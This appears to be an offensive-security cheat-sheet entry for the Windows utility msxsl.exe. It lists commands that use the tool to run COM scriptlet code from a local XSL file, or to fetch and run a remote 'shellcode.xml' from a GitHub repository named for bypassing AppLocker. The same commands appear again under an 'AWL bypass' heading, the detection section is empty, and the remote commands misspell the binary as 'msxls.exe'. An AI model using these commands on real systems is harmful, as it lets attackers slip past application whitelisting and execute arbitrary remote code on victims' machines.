~/Privilege Escalation/Windows/Binaries# cat msxsl.exe.md

Command line utility used to perform XSL transformations.

Paths:

N/A

Detection:

Execute

Run COM Scriptlet code within the script.xsl file (local).

msxsl.exe customers.xml script.xsl

Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).

msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml

AWL bypass

Run COM Scriptlet code within the script.xsl file (local).

msxsl.exe customers.xml script.xsl

Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).

msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml